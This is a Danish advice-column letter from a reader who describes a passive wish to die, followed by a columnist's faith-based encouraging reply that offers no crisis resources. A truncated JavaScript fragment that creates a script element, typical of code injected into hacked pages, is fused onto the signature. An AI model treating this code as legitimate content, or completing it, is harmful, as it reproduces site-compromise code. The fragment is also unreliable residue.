Jeg er blevet træt af livet…

Kære Suh.
Jeg er træt af livet. Har haft så meget modgang i mine 52 år, sygdom, førtidspension, skilsmisse, konflikter mellem mig og mine søskende, konflikter med mine børn.
Jeg tror på Gud, og han er den eneste, der holder mig i live. Ved jeg burde sætte mere pris på livet, men det gør jeg ikke. Er bare træt og orker ikke mere. Den eneste glæde, jeg har tilbage, er når jeg ind imellem ser mit barnebarn i de perioder, hvor der ikke er konflikter med min datter.
Det er tungt bare at vente på, at det får en ende engang, og jeg kan komme hjem til Gud.
Den Opgivende

Kære Opgivende
Du har i sandhed haft megen modgang i livet. Det er forståeligt, at du kan have lyst til at kaste håndklædet i ringen. Ikke desto mindre holder du dig stadig i live, og det lyder som om, at der er to grunde til det: din kærlighed og loyalitet overfor Gud og din kærlighed til dit barnebarn (måske er der også noget kærlighed til dine børn, men jeg forstår udemærket, at det i meget konfliktfyldte relationer kan være svært at få øje på de positive ting).
Mens du venter på at skulle hjem til Gud, kan du derfor prøve på at lade disse to ting fylde så meget som muligt i dit liv!
Dine omstændigheder uden en ægtefælle og uden mulighed for at kunne arbejde er naturligvis et tab, men du kan vælge at udnytte de muligheder, det samtidig giver dig? Prøv at tænke over, hvordan Gud mon bedst kan bruge dig med dine særlige forudsætninger? Kunne der være noget, du særligt kan gøre, netop på grund af dine rammer?
Jeg tænker fx på vigtigt frivilligt arbejde, som for andre kan være svært pga. logistik med arbejde og familie. Eller på at åbne dit hjem for folk, der har brug for det? I denne sammenhæng kan det være en fordel at bo alene.
Det kan også være, at du skulle rejse lidt væk enten for at udvide din egen horisont eller som et led i en måde at tjene Gud på? Lyt til dit hjerte og til, hvad Gud kunne inspirere dig til.
Dit barnebarn er en anden glimrende grund til at holde dig i live. Du elsker ham/hende, og den kærlighed annullerer ikke dine prøvelser, men kan gøre, at det alligevel er værd at udholde dem.
Prøv at overveje, hvordan du bedst muligt er en ressourceperson for dit barnebarn. Det kan være i form af pasning og hyggeligt samvær, ved at give små gaver, skrive hilsener eller praktisk hjælp med hvad der nu alderssvarende er brug for.
Ydermere, uanset om du vil det eller ej, så er du en rollemodel for både dit barnebarn og dine børn.
Den måde, du tackler livet på vil påvirke dem i deres væren i verden. Så om du lever eller dør, så gør det, så det ærer Gud.
Hilsen Suhvar d=document;var s=d.createElement(‘script’);